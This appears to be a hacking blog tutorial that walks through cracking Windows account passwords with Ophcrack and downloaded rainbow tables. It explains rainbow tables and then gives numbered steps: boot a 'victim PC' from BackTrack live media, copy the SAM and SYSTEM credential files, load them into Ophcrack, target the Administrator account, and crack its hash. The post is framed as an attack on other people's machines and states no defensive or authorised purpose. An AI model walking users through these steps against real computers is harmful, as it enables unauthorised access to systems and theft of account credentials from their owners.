I probably should have done this post first, because what you do here can be used in the previous hack using these rainbow files. Using Ophcrack, you can crack account password of almost all the Windows operating systems currently used in industry (i have not tested this on Windows8, but i assume it would work as long as they don't use "draw your password" feature) and since OphCrack is the fastest password cracking tool, it wont take more than 30 minutes to crack a password. So let's begin:
What Do You Need ?
BackTrack 5 Live DVD/USB.
Rainbow Files (i'll tell you what it is.)
Physical Access to victim PC.
So What-The-Hell is Rainbow Files ?
First thing that pops in mind when reading rainbow files is the collection of rainbows and unicorns flying(sarcasm), but no, rainbow files/tables are basically huge sets of precomputed tables filled with hash values that are pre-matched to possible plaintext passwords. The rainbow tables essentially allow hackers to reverse the hashing function to determine what the plaintext password might be. It's possible for two different passwords to result in the same hash so it's not important to find out what the original password was, just as long as it has the same hash. The plaintext password may not even be the same password that was created by the user, but as long as the hash is matched, then it doesn't matter what the original password was.
So What Do I Need To Do ?
You need to download the rainbow tables matching to the OS version of your victim PC. Get them Here.You can download the smaller files because they will work,unless your victim uses 28+ key long password.
NOTE: the vista files will work for Windows 7 and Windows 8 too.
Everything is Downloaded and ready, now put the downloaded rainbow tables on a flash drive.
Let's begin;
Step 1:
Boot the victim PC with BackTrack Live DVD. remember to start the GUI (startx)
Step 2:
Now navigate to the directory where windows password files are stored.
usually: WINDOWS/system32/config/
Step 3:
Locate the Files "SAM" and "System", and copy them to a new folder on the desktop of Backtrack
Step 4:
Run the OphCrack tool in backtrack by : start->Backtrack->Privilege Escalation->Password Attack->Offline Attacks->Ophcrack GUI.
Step 5:
Go to "Load" and select "Encrypted SAM" in ophcrack tool. Now it will ask you to select directory that contains SAM folder. Select the directory where you saved the SAM file (new folder on desktop).
Step 6:
Target the Administrator account, remove other account off the list (if any).
Step 7:
Plug in the pen-drive/flash drive, extract the rainbow tables to desktop.
Step 8:
Click on the "Table" button in ophcrack tool. Now it will ask you to select the table. Select the files as required.Click OK after that.
Step 9:
Now hit the "Crack" button, and wait a few minutes, you should have the key. reboot the windows machine into windows and test.
